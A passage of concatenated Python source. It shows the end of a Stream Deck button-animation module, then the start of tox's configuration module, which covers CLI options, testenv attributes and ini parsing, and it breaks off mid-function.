if bool(frame_timestamp) and frame_ms > frame_timestamp[frame_index]:
continue
frame = frames[frame_index].convert("RGBA")
frame_image = PILHelper.create_image(deck)
draw = ImageDraw.Draw(frame_image)
icon_width, icon_height = frame_image.width, frame_image.height
if text:
icon_height -= 20
frame.thumbnail((icon_width, icon_height), Image.LANCZOS)
icon_pos = ((frame_image.width - frame.width) // 2, 0)
frame_image.paste(frame, icon_pos, frame)
if text:
true_font = ImageFont.truetype(os.path.join(FONTS_PATH, font), 14)
label_w, label_h = draw.textsize(text, font=true_font)
if icon:
label_pos = ((frame_image.width - label_w) // 2, frame_image.height - 20)
else:
label_pos = ((frame_image.width - label_w) // 2, (frame_image.height // 2) - 7)
draw.text(label_pos, text=text, font=true_font, fill="white")
native_frame_image = PILHelper.to_native_format(deck, frame_image)
if bool(frame_timestamp):
while frame_ms < frame_timestamp[frame_index]:
frame_ms += 40 # 40ms/frame (25 fps)
icon_frames.append(native_frame_image)
icon_frames_to_save.append(frame_image)
else:
icon_frames.append(native_frame_image)
icon_frames_to_save.append(frame_image)
deck_id, page, button_id = key.split(".")
export_icon(deck_id, page, button_id, icon_frames_to_save)
return icon_frames
def start_animation() -> None:
global animation
animation = threading.Thread(target=animate)
animation.start()
stop_event.clear()
def stop_animation() -> None:
stop_event.set()
animation.join()
def animate() -> None:
frame_time = Fraction(1, 25)
next_frame = Fraction(time.monotonic())
# while not stop_event.is_set():
while True:
for deck_id, deck_state in state.items():
deck = decks.get(deck_id, None)
page = get_page(deck_id)
if not deck:
warn(f"{deck_id} has settings specified but is not seen. Likely unplugged!")
continue
try:
with deck:
for key, frames in animation_buttons[deck_id][page].items():
deck.set_key_image(key, next(frames))
except TransportError as err:
print("TransportError: {0}".format(err))
break
if stop_event.is_set():
return
next_frame += frame_time
sleep_interval = float(next_frame) - time.monotonic()
if sleep_interval >= 0:
time.sleep(sleep_interval)
animation = threading.Thread(target=animate)
stop_event = threading.Event()
if os.path.isfile(STATE_FILE):
_open_config(STATE_FILE)
|
__init__.py
|
from __future__ import print_function
import argparse
import itertools
import os
import random
import re
import shlex
import string
import sys
import traceback
import warnings
from collections import OrderedDict
from fnmatch import fnmatchcase
from subprocess import list2cmdline
from threading import Thread
import pluggy
import py
import six
import toml
from packaging import requirements
from packaging.utils import canonicalize_name
from packaging.version import Version
import tox
from tox.constants import INFO
from tox.exception import MissingDependency
from tox.interpreters import Interpreters, NoInterpreterInfo
from tox.reporter import (
REPORTER_TIMESTAMP_ON_ENV,
error,
update_default_reporter,
using,
verbosity1,
)
from tox.util.path import ensure_empty_dir
from tox.util.stdlib import importlib_metadata
from .parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from .parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from .parallel import add_parallel_config, add_parallel_flags
from .reporter import add_verbosity_commands
try:
from shlex import quote as shlex_quote
except ImportError:
from pipes import quote as shlex_quote
hookimpl = tox.hookimpl
# DEPRECATED - REMOVE - left for compatibility with plugins importing from here.
# Import hookimpl directly from tox instead.
WITHIN_PROVISION = os.environ.get(str("TOX_PROVISION")) == "1"
SUICIDE_TIMEOUT = 0.0
INTERRUPT_TIMEOUT = 0.3
TERMINATE_TIMEOUT = 0.2
_FACTOR_LINE_PATTERN = re.compile(r"^([\w{}\.!,-]+)\:\s+(.+)")
_ENVSTR_SPLIT_PATTERN = re.compile(r"((?:\{[^}]+\})+)|,")
_ENVSTR_EXPAND_PATTERN = re.compile(r"\{([^}]+)\}")
_WHITESPACE_PATTERN = re.compile(r"\s+")
def get_plugin_manager(plugins=()):
# initialize plugin manager
import tox.venv
pm = pluggy.PluginManager("tox")
pm.add_hookspecs(tox.hookspecs)
pm.register(tox.config)
pm.register(tox.interpreters)
pm.register(tox.venv)
pm.register(tox.session)
from tox import package
pm.register(package)
pm.load_setuptools_entrypoints("tox")
for plugin in plugins:
pm.register(plugin)
pm.check_pending()
return pm
class Parser:
"""Command line and ini-parser control object."""
def __init__(self):
class HelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(HelpFormatter, self).__init__(prog, max_help_position=35, width=190)
self.argparser = argparse.ArgumentParser(
description="tox options",
add_help=False,
prog="tox",
formatter_class=HelpFormatter,
)
self._testenv_attr = []
def add_argument(self, *args, **kwargs):
"""add argument to command line parser. This takes the
same arguments that ``argparse.ArgumentParser.add_argument``.
"""
return self.argparser.add_argument(*args, **kwargs)
def add_testenv_attribute(self, name, type, help, default=None, postprocess=None):
"""add an ini-file variable for "testenv" section.
Types are specified as strings like "bool", "line-list", "string", "argv", "path",
"argvlist".
The ``postprocess`` function will be called for each testenv
like ``postprocess(testenv_config=testenv_config, value=value)``
where ``value`` is the value as read from the ini (or the default value)
and ``testenv_config`` is a :py:class:`tox.config.TestenvConfig` instance
which will receive all ini-variables as object attributes.
Any postprocess function must return a value which will then be set
as the final value in the testenv section.
"""
self._testenv_attr.append(VenvAttribute(name, type, default, help, postprocess))
def add_testenv_attribute_obj(self, obj):
"""add an ini-file variable as an object.
This works as the ``add_testenv_attribute`` function but expects
"name", "type", "help", and "postprocess" attributes on the object.
"""
assert hasattr(obj, "name")
assert hasattr(obj, "type")
assert hasattr(obj, "help")
assert hasattr(obj, "postprocess")
self._testenv_attr.append(obj)
def parse_cli(self, args, strict=False):
args, argv = self.argparser.parse_known_args(args)
if argv and (strict or WITHIN_PROVISION):
self.argparser.error("unrecognized arguments: {}".format(" ".join(argv)))
return args
def _format_help(self):
return self.argparser.format_help()
class VenvAttribute:
def __init__(self, name, type, default, help, postprocess):
self.name = name
self.type = type
self.default = default
self.help = help
self.postprocess = postprocess
class DepOption:
name = "deps"
type = "line-list"
help = "each line specifies a dependency in pip/setuptools format."
default = ()
def postprocess(self, testenv_config, value):
deps = []
config = testenv_config.config
for depline in value:
m = re.match(r":(\w+):\s*(\S+)", depline)
if m:
iname, name = m.groups()
ixserver = config.indexserver[iname]
else:
name = depline.strip()
ixserver = None
# we need to process options, in case they contain a space,
# as the subprocess call to pip install will otherwise fail.
# in case of a short option, we remove the space
for option in tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT:
if name.startswith(option):
name = "{}{}".format(option, name[len(option) :].strip())
# in case of a long option, we add an equal sign
for option in tox.PIP.INSTALL_LONG_OPTIONS_ARGUMENT:
name_start = "{} ".format(option)
if name.startswith(name_start):
name = "{}={}".format(option, name[len(option) :].strip())
name = self._cut_off_dep_comment(name)
name = self._replace_forced_dep(name, config)
deps.append(DepConfig(name, ixserver))
return deps
def _replace_forced_dep(self, name, config):
"""Override given dependency config name. Take ``--force-dep-version`` option into account.
:param name: dep config, for example ["pkg==1.0", "other==2.0"].
:param config: ``Config`` instance
:return: the new dependency that should be used for virtual environments
"""
if not config.option.force_dep:
return name
for forced_dep in config.option.force_dep:
if self._is_same_dep(forced_dep, name):
return forced_dep
return name
@staticmethod
def _cut_off_dep_comment(name):
return re.sub(r"\s+#.*", "", name).strip()
@classmethod
def _is_same_dep(cls, dep1, dep2):
"""Definitions are the same if they refer to the same package, even if versions differ."""
dep1_name = canonicalize_name(requirements.Requirement(dep1).name)
try:
dep2_name = canonicalize_name(requirements.Requirement(dep2).name)
except requirements.InvalidRequirement:
# we couldn't parse a version, probably a URL
return False
return dep1_name == dep2_name
class PosargsOption:
name = "args_are_paths"
type = "bool"
default = True
help = "treat positional args in commands as paths"
def postprocess(self, testenv_config, value):
config = testenv_config.config
args = config.option.args
if args:
if value:
args = []
for arg in config.option.args:
if arg and not os.path.isabs(arg):
origpath = os.path.join(config.invocationcwd.strpath, arg)
if os.path.exists(origpath):
arg = os.path.relpath(origpath, testenv_config.changedir.strpath)
args.append(arg)
testenv_config._reader.addsubstitutions(args)
return value
class InstallcmdOption:
name = "install_command"
type = "argv_install_command"
default = r"python -m pip install \{opts\} \{packages\}"
help = "install command for dependencies and package under test."
def postprocess(self, testenv_config, value):
if "{packages}" not in value:
raise tox.exception.ConfigError(
"'install_command' must contain '{packages}' substitution",
)
return value
def parseconfig(args, plugins=()):
"""Parse the configuration file and create a Config object.
:param plugins:
:param list[str] args: list of arguments.
:rtype: :class:`Config`
:raise SystemExit: toxinit file is not found
"""
pm = get_plugin_manager(plugins)
config, option = parse_cli(args, pm)
update_default_reporter(config.option.quiet_level, config.option.verbose_level)
for config_file in propose_configs(option.configfile):
config_type = config_file.basename
content = None
if config_type == "pyproject.toml":
toml_content = get_py_project_toml(config_file)
try:
content = toml_content["tool"]["tox"]["legacy_tox_ini"]
except KeyError:
continue
try:
ParseIni(config, config_file, content)
except SkipThisIni:
continue
pm.hook.tox_configure(config=config) # post process config object
break
else:
parser = Parser()
pm.hook.tox_addoption(parser=parser)
# if no tox config file, now we need do a strict argument evaluation
# raise on unknown args
parser.parse_cli(args, strict=True)
if option.help or option.helpini:
return config
if option.devenv:
# To load defaults, we parse an empty config
ParseIni(config, py.path.local(), "")
pm.hook.tox_configure(config=config)
return config
msg = "tox config file (either {}) not found"
candidates = ", ".join(INFO.CONFIG_CANDIDATES)
feedback(msg.format(candidates), sysexit=not (option.help or option.helpini))
return config
def get_py_project_toml(path):
with open(str(path)) as file_handler:
config_data = toml.load(file_handler)
return config_data
def propose_configs(cli_config_file):
from_folder = py.path.local()
if cli_config_file is not None:
if os.path.isfile(cli_config_file):
yield py.path.local(cli_config_file)
return
if os.path.isdir(cli_config_file):
from_folder = py.path.local(cli_config_file)
else:
print(
"ERROR: {} is neither file or directory".format(cli_config_file),
file=sys.stderr,
)
return
for basename in INFO.CONFIG_CANDIDATES:
if from_folder.join(basename).isfile():
yield from_folder.join(basename)
for path in from_folder.parts(reverse=True):
ini_path = path.join(basename)
if ini_path.check():
yield ini_path
def parse_cli(args, pm):
parser = Parser()
pm.hook.tox_addoption(parser=parser)
option = parser.parse_cli(args)
if option.version:
print(get_version_info(pm))
raise SystemExit(0)
interpreters = Interpreters(hook=pm.hook)
config = Config(
pluginmanager=pm,
option=option,
interpreters=interpreters,
parser=parser,
args=args,
)
return config, option
def feedback(msg, sysexit=False):
print("ERROR: {}".format(msg), file=sys.stderr)
if sysexit:
raise SystemExit(1)
def get_version_info(pm):
out = ["{} imported from {}".format(tox.__version__, tox.__file__)]
plugin_dist_info = pm.list_plugin_distinfo()
if plugin_dist_info:
out.append("registered plugins:")
for mod, egg_info in plugin_dist_info:
source = getattr(mod, "__file__", repr(mod))
out.append(" {}-{} at {}".format(egg_info.project_name, egg_info.version, source))
return "\n".join(out)
class SetenvDict(object):
_DUMMY = object()
def __init__(self, definitions, reader):
self.definitions = definitions
self.reader = reader
self.resolved = {}
self._lookupstack = []
def __repr__(self):
return "{}: {}".format(self.__class__.__name__, self.definitions)
def __contains__(self, name):
return name in self.definitions
def get(self, name, default=None):
try:
return self.resolved[name]
except KeyError:
try:
if name in self._lookupstack:
raise KeyError(name)
val = self.definitions[name]
except KeyError:
return os.environ.get(name, default)
self._lookupstack.append(name)
try:
self.resolved[name] = res = self.reader._replace(val, name="setenv")
finally:
self._lookupstack.pop()
return res
def __getitem__(self, name):
x = self.get(name, self._DUMMY)
if x is self._DUMMY:
raise KeyError(name)
return x
def keys(self):
return self.definitions.keys()
def __setitem__(self, name, value):
self.definitions[name] = value
self.resolved[name] = value
def items(self):
return ((name, self[name]) for name in self.definitions)
def export(self):
# post-process items to avoid internal syntax/semantics
# such as {} being escaped using \{\}, suitable for use with
# os.environ .
return {
name: Replacer._unescape(value)
for name, value in self.items()
if value is not self._DUMMY
}
@tox.hookimpl
def tox_addoption(parser):
parser.add_argument(
"--version",
action="store_true",
help="report version information to stdout.",
)
parser.add_argument("-h", "--help", action="store_true", help="show help about options")
parser.add_argument(
"--help-ini",
"--hi",
action="store_true",
dest="helpini",
help="show help about ini-names",
)
add_verbosity_commands(parser)
parser.add_argument(
"--showconfig",
action="store_true",
help="show live configuration (by default all env, with -l only default targets,"
" specific via TOXENV/-e)",
)
parser.add_argument(
"-l",
"--listenvs",
action="store_true",
help="show list of test environments (with description if verbose)",
)
parser.add_argument(
"-a",
"--listenvs-all",
action="store_true",
help="show list of all defined environments (with description if verbose)",
)
parser.add_argument(
"-c",
dest="configfile",
help="config file name or directory with 'tox.ini' file.",
)
parser.add_argument(
"-e",
action="append",
dest="env",
metavar="envlist",
help="work against specified environments (ALL selects all).",
)
parser.add_argument(
"--devenv",
metavar="ENVDIR",
help=(
"sets up a development environment at ENVDIR based on the env's tox "
"configuration specified by `-e` (-e defaults to py)."
),
)
parser.add_argument("--notest", action="store_true", help="skip invoking test commands.")
parser.add_argument(
"--sdistonly",
action="store_true",
help="only perform the sdist packaging activity.",
)
parser.add_argument(
"--skip-pkg-install",
action="store_true",
help="skip package installation for this run",
)
add_parallel_flags(parser)
parser.add_argument(
"--parallel--safe-build",
action="store_true",
dest="parallel_safe_build",
help="(deprecated) ensure two tox builds can run in parallel "
"(uses a lock file in the tox workdir with .lock extension)",
)
parser.add_argument(
"--installpkg",
metavar="PATH",
help="use specified package for installation into venv, instead of creating an sdist.",
)
parser.add_argument(
"--develop",
action="store_true",
help="install package in the venv using 'setup.py develop' via 'pip -e .'",
)
parser.add_argument(
"-i",
"--index-url",
action="append",
dest="indexurl",
metavar="URL",
help="set indexserver url (if URL is of form name=url set the "
"url for the 'name' indexserver, specifically)",
)
parser.add_argument(
"--pre",
action="store_true",
help="install pre-releases and development versions of dependencies. "
"This will pass the --pre option to install_command "
"(pip by default).",
)
parser.add_argument(
"-r",
"--recreate",
action="store_true",
help="force recreation of virtual environments",
)
parser.add_argument(
"--result-json",
dest="resultjson",
metavar="PATH",
help="write a json file with detailed information "
"about all commands and results involved.",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="PATH",
help="for python discovery first try the python executables under these paths",
default=[],
)
# We choose 1 to 4294967295 because it is the range of PYTHONHASHSEED.
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. "
"Defaults to a random integer in the range [1, 4294967295] "
"([1, 1024] on Windows). "
"Passing 'noset' suppresses this behavior.",
)
parser.add_argument(
"--force-dep",
action="append",
metavar="REQ",
help="Forces a certain version of one of the dependencies "
"when configuring the virtual environment. REQ Examples "
"'pytest<2.7' or 'django>=1.6'.",
)
parser.add_argument(
"--sitepackages",
action="store_true",
help="override sitepackages setting to True in all envs",
)
parser.add_argument(
"--alwayscopy",
action="store_true",
help="override alwayscopy setting to True in all envs",
)
cli_skip_missing_interpreter(parser)
parser.add_argument("--workdir", metavar="PATH", help="tox working directory")
parser.add_argument(
"args",
nargs="*",
help="additional arguments available to command positional substitution",
)
def _set_envdir_from_devenv(testenv_config, value):
if testenv_config.config.option.devenv is not None:
return py.path.local(testenv_config.config.option.devenv)
else:
return value
parser.add_testenv_attribute(
name="envdir",
type="path",
default="{toxworkdir}/{envname}",
help="set venv directory -- be very careful when changing this as tox "
"will remove this directory when recreating an environment",
postprocess=_set_envdir_from_devenv,
)
# add various core venv interpreter attributes
def setenv(testenv_config, value):
setenv = value
config = testenv_config.config
if "PYTHONHASHSEED" not in setenv and config.hashseed is not None:
setenv["PYTHONHASHSEED"] = config.hashseed
setenv["TOX_ENV_NAME"] = str(testenv_config.envname)
setenv["TOX_ENV_DIR"] = str(testenv_config.envdir)
return setenv
parser.add_testenv_attribute(
name="setenv",
type="dict_setenv",
postprocess=setenv,
help="list of X=Y lines with environment variable settings",
)
def basepython_default(testenv_config, value):
"""either user set or proposed from the factor name
in both cases we check that the factor name implied python version and the resolved
python interpreter version match up; if they don't we warn, unless ignore base
python conflict is set in which case the factor name implied version if forced
"""
for factor in testenv_config.factors:
match = tox.PYTHON.PY_FACTORS_RE.match(factor)
if match:
base_exe = {"py": "python"}.get(match.group(1), match.group(1))
version_s = match.group(2)
if not version_s:
version_info = ()
elif len(version_s) == 1:
version_info = (version_s,)
else:
version_info = (version_s[0], version_s[1:])
implied_version = ".".join(version_info)
implied_python = "{}{}".format(base_exe, implied_version)
break
else:
implied_python, version_info, implied_version = None, (), ""
if testenv_config.config.ignore_basepython_conflict and implied_python is not None:
return implied_python
proposed_python = (implied_python or sys.executable) if value is None else str(value)
if implied_python is not None and implied_python != proposed_python:
testenv_config.basepython = proposed_python
python_info_for_proposed = testenv_config.python_info
if not isinstance(python_info_for_proposed, NoInterpreterInfo):
proposed_version = ".".join(
str(x) for x in python_info_for_proposed.version_info[: len(version_info)]
)
if proposed_version != implied_version:
# TODO(stephenfin): Raise an exception here in tox 4.0
warnings.warn(
"conflicting basepython version (set {}, should be {}) for env '{}';"
"resolve conflict or set ignore_basepython_conflict".format(
proposed_version,
implied_version,
testenv_config.envname,
),
)
return proposed_python
parser.add_testenv_attribute(
name="basepython",
type="basepython",
default=None,
postprocess=basepython_default,
help="executable name or path of interpreter used to create a virtual test environment.",
)
def merge_description(testenv_config, value):
"""the reader by default joins generated description with new line,
replace new line with space"""
return value.replace("\n", " ")
parser.add_testenv_attribute(
name="description",
type="string",
default="",
postprocess=merge_description,
help="short description of this environment",
)
parser.add_testenv_attribute(
name="envtmpdir",
type="path",
default="{envdir}/tmp",
help="venv temporary directory",
)
parser.add_testenv_attribute(
name="envlogdir",
type="path",
default="{envdir}/log",
help="venv log directory",
)
parser.add_testenv_attribute(
name="downloadcache",
type="string",
default=None,
help="(ignored) has no effect anymore, pip-8 uses local caching by default",
)
parser.add_testenv_attribute(
name="changedir",
type="path",
default="{toxinidir}",
help="directory to change to when running commands",
)
parser.add_testenv_attribute_obj(PosargsOption())
def skip_install_default(testenv_config, value):
return value is True or testenv_config.config.option.skip_pkg_install is True
parser.add_testenv_attribute(
name="skip_install",
type="bool",
default=False,
postprocess=skip_install_default,
help="Do not install the current package. This can be used when you need the virtualenv "
"management but do not want to install the current package",
)
parser.add_testenv_attribute(
name="ignore_errors",
type="bool",
default=False,
help="if set to True all commands will be executed irrespective of their result error "
"status.",
)
def recreate(testenv_config, value):
if testenv_config.config.option.recreate:
return True
return value
parser.add_testenv_attribute(
name="recreate",
type="bool",
default=False,
postprocess=recreate,
help="always recreate this test environment.",
)
def passenv(testenv_config, value):
# Flatten the list to deal with space-separated values.
value = list(itertools.chain.from_iterable([x.split(" ") for x in value]))
passenv = {
"CURL_CA_BUNDLE",
"LANG",
"LANGUAGE",
"LD_LIBRARY_PATH",
"PATH",
"PIP_INDEX_URL",
"PIP_EXTRA_INDEX_URL",
"REQUESTS_CA_BUNDLE",
"SSL_CERT_FILE",
"TOX_WORK_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY",
str(REPORTER_TIMESTAMP_ON_ENV),
str(PARALLEL_ENV_VAR_KEY_PUBLIC),
}
# read in global passenv settings
p = os.environ.get("TOX_TESTENV_PASSENV", None)
if p is not None:
env_values = [x for x in p.split() if x]
value.extend(env_values)
# we ensure that tmp directory settings are passed on
# we could also set it to the per-venv "envtmpdir"
# but this leads to very long paths when run with jenkins
# so we just pass it on by default for now.
if tox.INFO.IS_WIN:
passenv.add("SYSTEMDRIVE") # needed for pip6
passenv.add("SYSTEMROOT") # needed for python's crypto module
passenv.add("PATHEXT") # needed for discovering executables
passenv.add("COMSPEC") # needed for distutils cygwincompiler
passenv.add("TEMP")
passenv.add("TMP")
# for `multiprocessing.cpu_count()` on Windows (prior to Python 3.4).
passenv.add("NUMBER_OF_PROCESSORS")
passenv.add("PROCESSOR_ARCHITECTURE") # platform.machine()
passenv.add("USERPROFILE") # needed for `os.path.expanduser()`
passenv.add("MSYSTEM") # fixes #429
else:
passenv.add("TMPDIR")
for spec in value:
for name in os.environ:
if fnmatchcase(name.upper(), spec.upper()):
passenv.add(name)
return passenv
parser.add_testenv_attribute(
name="passenv",
type="line-list",
postprocess=passenv,
help="environment variables needed during executing test commands (taken from invocation "
"environment). Note that tox always passes through some basic environment variables "
"which are needed for basic functioning of the Python system. See --showconfig for the "
"eventual passenv setting.",
)
parser.add_testenv_attribute(
name="whitelist_externals",
type="line-list",
help="DEPRECATED: use allowlist_externals",
)
parser.add_testenv_attribute(
name="allowlist_externals",
type="line-list",
help="each lines specifies a path or basename for which tox will not warn "
"about it coming from outside the test environment.",
)
parser.add_testenv_attribute(
name="platform",
type="string",
default=".*",
help="regular expression which must match against ``sys.platform``. "
"otherwise testenv will be skipped.",
)
def sitepackages(testenv_config, value):
return testenv_config.config.option.sitepackages or value
def alwayscopy(testenv_config, value):
return testenv_config.config.option.alwayscopy or value
parser.add_testenv_attribute(
name="sitepackages",
type="bool",
default=False,
postprocess=sitepackages,
help="Set to ``True`` if you want to create virtual environments that also "
"have access to globally installed packages.",
)
parser.add_testenv_attribute(
"download",
type="bool",
default=False,
help="download the latest pip, setuptools and wheel when creating the virtual"
"environment (default is to use the one bundled in virtualenv)",
)
parser.add_testenv_attribute(
name="alwayscopy",
type="bool",
default=False,
postprocess=alwayscopy,
help="Set to ``True`` if you want virtualenv to always copy files rather "
"than symlinking.",
)
def pip_pre(testenv_config, value):
return testenv_config.config.option.pre or value
parser.add_testenv_attribute(
name="pip_pre",
type="bool",
default=False,
postprocess=pip_pre,
help="If ``True``, adds ``--pre`` to the ``opts`` passed to the install command. ",
)
def develop(testenv_config, value):
option = testenv_config.config.option
return not option.installpkg and (value or option.develop or option.devenv is not None)
parser.add_testenv_attribute(
name="usedevelop",
type="bool",
postprocess=develop,
default=False,
help="install package in develop/editable mode",
)
parser.add_testenv_attribute_obj(InstallcmdOption())
parser.add_testenv_attribute(
name="list_dependencies_command",
type="argv",
default="python -m pip freeze",
help="list dependencies for a virtual environment",
)
parser.add_testenv_attribute_obj(DepOption())
parser.add_testenv_attribute(
name="suicide_timeout",
type="float",
default=SUICIDE_TIMEOUT,
help="timeout to allow process to exit before sending SIGINT",
)
parser.add_testenv_attribute(
name="interrupt_timeout",
type="float",
default=INTERRUPT_TIMEOUT,
help="timeout before sending SIGTERM after SIGINT",
)
parser.add_testenv_attribute(
name="terminate_timeout",
type="float",
default=TERMINATE_TIMEOUT,
help="timeout before sending SIGKILL after SIGTERM",
)
parser.add_testenv_attribute(
name="commands",
type="argvlist",
default="",
help="each line specifies a test command and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_pre",
type="argvlist",
default="",
help="each line specifies a setup command action and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_post",
type="argvlist",
default="",
help="each line specifies a teardown command and can use substitution.",
)
parser.add_testenv_attribute(
"ignore_outcome",
type="bool",
default=False,
help="if set to True a failing result of this testenv will not make "
"tox fail, only a warning will be produced",
)
parser.add_testenv_attribute(
"extras",
type="line-list",
help="list of extras to install with the source distribution or develop install",
)
add_parallel_config(parser)
def cli_skip_missing_interpreter(parser):
class SkipMissingInterpreterAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise argparse.ArgumentTypeError("value must be config, true or false")
setattr(namespace, self.dest, value)
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="val",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
class Config(object):
"""Global Tox config object."""
def __init__(self, pluginmanager, option, interpreters, parser, args):
self.envconfigs = OrderedDict()
"""Mapping envname -> envconfig"""
self.invocationcwd = py.path.local()
self.interpreters = interpreters
self.pluginmanager = pluginmanager
self.option = option
self._parser = parser
self._testenv_attr = parser._testenv_attr
self.args = args
"""option namespace containing all parsed command line options"""
@property
def homedir(self):
homedir = get_homedir()
if homedir is None:
homedir = self.toxinidir # FIXME XXX good idea?
return homedir
class TestenvConfig:
"""Testenv Configuration object.
In addition to some core attributes/properties this config object holds all
per-testenv ini attributes as attributes, see "tox --help-ini" for an overview.
"""
def __init__(self, envname, config, factors, reader):
#: test environment name
self.envname = envname
#: global tox config object
self.config = config
#: set of factors
self.factors = factors
self._reader = reader
self._missing_subs = {}
"""Holds substitutions that could not be resolved.
Pre 2.8.1 missing substitutions crashed with a ConfigError although this would not be a
problem if the env is not part of the current testrun. So we need to remember this and
check later when the testenv is actually run and crash only then.
"""
# Python 3 only, as __getattribute__ is ignored for old-style types on Python 2
def __getattribute__(self, name):
rv = object.__getattribute__(self, name)
if isinstance(rv, Exception):
raise rv
return rv
if six.PY2:
def __getattr__(self, name):
if name in self._missing_subs:
raise self._missing_subs[name]
raise AttributeError(name)
def get_envbindir(self):
"""Path to directory where scripts/binaries reside."""
is_bin = (
isinstance(self.python_info, NoInterpreterInfo)
or tox.INFO.IS_WIN is False
or self.python_info.implementation == "Jython"
or (
tox.INFO.IS_WIN
and self.python_info.implementation == "PyPy"
and self.python_info.extra_version_info < (7, 3, 1)
)
)
return self.envdir.join("bin" if is_bin else "Scripts")
@property
def envbindir(self):
return self.get_envbindir()
@property
def envpython(self):
"""Path to python executable."""
return self.get_envpython()
def get_envpython(self):
""" path to python/jython executable. """
if "jython" in str(self.basepython):
name = "jython"
else:
name = "python"
return self.envbindir.join(name)
def get_envsitepackagesdir(self):
"""Return sitepackagesdir of the virtualenv environment.
NOTE: Only available during execution, not during parsing.
"""
x = self.config.interpreters.get_sitepackagesdir(info=self.python_info, envdir=self.envdir)
return x
@property
def python_info(self):
"""Return sitepackagesdir of the virtualenv environment."""
return self.config.interpreters.get_info(envconfig=self)
def getsupportedinterpreter(self):
if tox.INFO.IS_WIN and self.basepython and "jython" in self.basepython:
raise tox.exception.UnsupportedInterpreter(
"Jython/Windows does not support installing scripts",
)
info = self.config.interpreters.get_info(envconfig=self)
if not info.executable:
raise tox.exception.InterpreterNotFound(self.basepython)
if not info.version_info:
raise tox.exception.InvocationError(
"Failed to get version_info for {}: {}".format(info.name, info.err),
)
return info.executable
testenvprefix = "testenv:"
def get_homedir():
try:
return py.path.local._gethomedir()
except Exception:
return None
def make_hashseed():
max_seed = 4294967295
if tox.INFO.IS_WIN:
max_seed = 1024
return str(random.randint(1, max_seed))
class SkipThisIni(Exception):
"""Internal exception to indicate the parsed ini file should be skipped"""
class ParseIni(object):
def __init__(self, config, ini_path, ini_data): # noqa
config.toxinipath = ini_path
using("tox.ini: {} (pid {})".format(config.toxinipath, os.getpid()))
config.toxinidir = config.toxinipath.dirpath() if ini_path.check(file=True) else ini_path
self._cfg = py.iniconfig.IniConfig(config.toxinipath, ini_data)
if ini_path.basename == "setup.cfg" and "tox:tox" not in self._cfg:
verbosity1("Found no [tox:tox] section in setup.cfg, skipping.")
raise SkipThisIni()
previous_line_of = self._cfg.lineof
self.expand_section_names(self._cfg)
def line_of_default_to_zero(section, name=None):
at = previous_line_of(section, name=name)
if at is None:
at = 0
return at
self._cfg.lineof = line_of_default_to_zero
config._cfg = self._cfg
self.config = config
prefix = "tox" if ini_path.basename == "setup.cfg" else None
fallbacksection = "tox:tox" if ini_path.basename == "setup.cfg" else "tox"
context_name = getcontextname()
if context_name == "jenkins":
reader = SectionReader(
"tox:jenkins",
self._cfg,
prefix=prefix,
fallbacksections=[fallbacksection],
)
dist_share_default = "{toxworkdir}/distshare"
elif not context_name:
reader = SectionReader("tox", self._cfg, prefix=prefix)
dist_share_default = "{homedir}/.tox/distshare"
else:
raise ValueError("invalid context")
if config.option.hashseed is None:
hash_seed = make_hashseed()
elif config.option.hashseed == "noset":
hash_seed = None
else:
hash_seed = config.option.hashseed
config.hashseed = hash_seed
reader.addsubstitutions(toxinidir=config.toxinidir, homedir=config.homedir)
if config.option.workdir is None:
config.toxworkdir = reader.getpath("toxworkdir", "{toxinidir}/.tox")
else:
config.toxworkdir = config.toxinidir.join(config.option.workdir, abs=True)
if os.path.exists(str(config.toxworkdir)):
config.toxworkdir = config.toxworkdir.realpath()
reader.addsubstitutions(toxworkdir=config.toxworkdir)
config.ignore_basepython_conflict = reader.getbool("ignore_basepython_conflict", False)
config.distdir = reader.getpath("distdir", "{toxworkdir}/dist")
reader.addsubstitutions(distdir=config.distdir)
config.distshare = reader.getpath("distshare", dist_share_default)
reader.addsubstitutions(distshare=config.distshare)
config.temp_dir = reader.getpath("temp_dir", "{toxworkdir}/.tmp")
reader.addsubstitutions(temp_dir=config.temp_dir)
config.sdistsrc = reader.getpath("sdistsrc", None)
config.setupdir = reader.getpath("setupdir", "{toxinidir}")
config.logdir = config.toxworkdir.join("log")
within_parallel = PARALLEL_ENV_VAR_KEY_PRIVATE in os.environ
if not within_parallel and not WITHIN_PROVISION:
ensure_empty_dir(config.logdir)
# determine indexserver dictionary
config.indexserver = {"default": IndexServerConfig("default")}
prefix = "indexserver"
for line in reader.getlist(prefix):
name, url = map(lambda x: x.strip(), line.split("=", 1))
config.indexserver[name] = IndexServerConfig(name, url)
if config.option.skip_missing_interpreters == "config":
val = reader.getbool("skip_missing_interpreters", False)
config.option.skip_missing_interpreters = "true" if val else "false"
override = False
if config.option.indexurl:
for url_def in config.option.indexurl:
m = re.match(r"\W*(\w+)=(\S+)", url_def)
if m is None:
url = url_def
name = "default"
else:
name, url = m.groups()
if not url:
url = None
if name != "ALL":
config.indexserver[name].url = url
else:
override = url
# let ALL override all existing entries
if override:
for name in config.indexserver:
config.indexserver[name] = IndexServerConfig(name, override)
self.handle_provision(config, reader)
self.parse_build_isolation(config, reader)
res = self._getenvdata(reader, config)
config.envlist, all_envs, config.envlist_default, config.envlist_explicit = res
# factors used in config or predefined
known_factors = self._list_section_factors("testenv")
known_factors.update({"py", "python"})
# factors stated in config envlist
stated_envlist = reader.getstring("envlist", replace=False)
if stated_envlist:
for env in _split_env(stated_envlist):
known_factors.update(env.split("-"))
# configure testenvs
to_do = []
failures = OrderedDict()
results = {}
cur_self = self
def run(name, section, subs, config):
try:
results[name] = cur_self.make_envconfig(name, section, subs, config)
except Exception as exception:
failures[name] = (exception, traceback.format_exc())
order = []
